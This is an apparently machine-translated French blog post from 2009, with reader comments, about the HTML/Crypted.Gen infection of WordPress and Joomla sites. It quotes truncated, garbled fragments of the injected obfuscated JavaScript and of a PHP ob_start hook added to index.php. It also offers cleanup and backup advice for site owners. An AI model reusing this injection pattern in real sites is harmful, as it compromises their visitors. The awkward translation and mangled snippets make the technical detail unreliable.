imaginepaolo, l'image a aucun mur

Crypted.Gen attaques WordPress et Joomla

HTML / Crypted.Gen attaques WordPress et Joomla

Commentaire du 12 Novembre 2009 7 (10942 vues)

Classés sous: Nouvelles

Explication intéressante de l'attaque à prendre imaginepaolo http://www.settorezero.com/ :

Il se passe plus souvent ces derniers temps, que de nombreux sites basés sur Wordpress et Joomla, sont attaqués d'une certaine façon par le cheval de Troie rapportés par Avira comme «HTML / Crypted.Gen". Je ne pouvais pas dire si c'est un problème avec les bugs existants dans ces deux systèmes d'édition (mais j'en doute) ou plutôt par un virus qui a attaqué les serveurs qui hébergent ces sites.
Cette dernière hypothèse j'étais soutenu par le fait que tous les gens que j'ai contactés et qui ont eu le même problème, ils sont tous au même fournisseur d'hébergement. Ne bouge pas même les frais pour l'instant car il est assez inhabituel, et je n'ai pas trouvé un réseau d'information satisfaisants pour rendre une hypothèse valable, alors la mienne ne sont que des hypothèses et devraient être pris comme tel.
En attendant j'espère que ce post peut être utile et a discuté de comprendre d'où provient le problème.
D'abord et avant tout, c'est à dire que le virus modifie les pages (mais pas toujours toutes les pages du site) avec des extensions html, php, asp et js, en ajoutant un code javascript crypté qui commence plus ou moins comme ceci:
  "javascript" > $a = \ "Z64dZ3dZ22q|se|qdu]qwys^e}rub8tqiZ3c0} <script Language = "javascript"> $ a = \ "Z64dZ3dZ22q | si | qdu] qwys ^ e}} rub8tqiZ3c0 
Je dis "plus ou moins" parce que pas tout le monde regarde la même manière, cependant, il est facile d'identifier le code malveillant, car, comme nous le voyons, est quelque peu obscurci: mots-clés ne sont pas lus, mais des séquences de caractères ne paraissent absurdes.
En ce qui concerne wordpress, cependant, le code malveillant est habituellement inséré sur chaque page "index.php" et commence de cette façon:
  1 
  ( "security_update" ) ; function security_update ( $buffer ) { return $buffer . "<script language= \" javascript \" > $a = \" Z64dZ3dZ22q|se|qdu]qwys^e} <PHP ob_start ("security_update");? Security_update fonction ($ buffer) {. Return $ buffer "<script Language= \" JavaScript \"> $ a = \" Z64dZ3dZ22q | si | qdu] qwys ^ et} 
Il semble que le script ne cause pas de dégâts et est seulement détecté par Avira (Ask). Le problème est résolu en éliminant les effets néfastes des pages de script, ou de charger une copie saine des pages sur le serveur.
Certains utilisateurs, cependant, après avoir obtenu un virus, ils ont trouvé une copie du site (ou d'autres pages web) stockés sur votre PC avec ce problème, alors l'attaque semble être «local» et non pas à distance: les pages semblent être attachés sur le même PC dans lequel ils résident. Cela me fait penser que ce n'est plus un problème d'hébergement: en fait, beaucoup ont sur votre ordinateur une copie du site infecté, et a été présent sur le serveur les pages de ce script.
La solution pour être en mesure de vous protéger toujours avoir une sauvegarde à jour de votre site sur votre PC et pour votre site web si nous n'étions pas fournies.
Je cite ici quelques liens utiles (surtout sur wordpress) liée au problème posé:
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://www.wordpress-it.it/forum/topic/12452
WordPress 2.8.5; Plus de 100 attaques pirates sur Aruba

Aucun message connexes

Annonce

7 Responses to "HTML / Crypted.Gen attaques WordPress et Joomla"

Prodi et les rêves des immigrants italiens en Espagne. «Malveillant», le réseau dit:
Décembre 10, 2009 à 14:01
MENACE [...] Bland - Il semble, en fait, il est presque immédiatement détecté une seule menace à droite Avira (et [...]
Maman Imperfect écrit:
Janvier 23, 2010 à 22:31
M'est arrivé deux fois en 20 jours. :-D
Arianna a écrit:
Janvier 25, 2010 à 16:02
Il m'est arrivé une attaque similaire (ne me souviens pas si le code était le même) en Novembre l'année dernière.
J'ai trouvé et enlevé le code malicieux le plugin antivirus avec WordPress. Mais j'ai fait ce que j'avais lu était la meilleure chose à faire: j'ai réinstallé tout, de plugins thème, j'ai aussi changé d'URL et mot de passe. Depuis lors, et pour l'instant, tout va bien ... mais je dis tranquillement.
Bonjour!
Valentina a écrit:
Mars 9, 2010 à 16:21
J'essaie de chercher les lignes de code que vous avez fournis, mais toujours rien. J'ai téléchargé tous mes blogs mis à part le dossier public et le MDB-base de données.
VOL dangereuse ?!... - Page 2 - Vespaonline écrit:
Mars 18, 2010 à 20:22
Bonjour bonjour Turbo [...] Essayez de regarder sur les forums Joomla, d'autres ont le même problème. HTML / Crypted.Gen attaques WordPress et Joomla | Design Web [+ question résolu] html / Crypted.Gen HTML / Crypted.Gen attaques WordPress et Joomla | Industrie [...]
Louis écrit:
Mars 20, 2010 à 19:38
Merci!
J'ai résolu le problème en supprimant le script.
Il a été nominé dans toutes les pages d'index, même ceux index_1. index_old, des copies des modifications vieux.
Merci encore ... Je vous dois une faveur
Neuville a écrit:
28 juillet 2010 à 23:38
Bonjour,
même chose m'est arrivé, n'est pas la première fois à Aruba (le fournisseur), mais il était de 7 ou 8 fois: commence à penser qu'il est des attaques ciblées de vendre d'anti-virus service est optionnel et payable: Evidemment fournisseurs va changer la vitesse de la lumière.
Mes soupçons sont tout à fait justifié, même pour le fait que depuis la dernière attaque, j'ai limité le nombre de plugins activés (tous «certifiés» et téléchargés à partir wp.org) et j'ai construit le modèle lui-même ... à ce point, puisque le problème n'a jamais porté sur les sites hébergés par Aruba J'ai toutes les raisons de douter de l'été ... trop mal, mais si je peux le week-end j'ai acheté un autre hébergement. si vous avez des conseils sont les bienvenus
Je ne pense pas que c'est une vulnérabilité dans WordPress, j'ai la version 2.9.2, qui s'est bien passé pour un «tout et il est stable (en fait je n'ai pas passer à 3, par crainte d'attaques)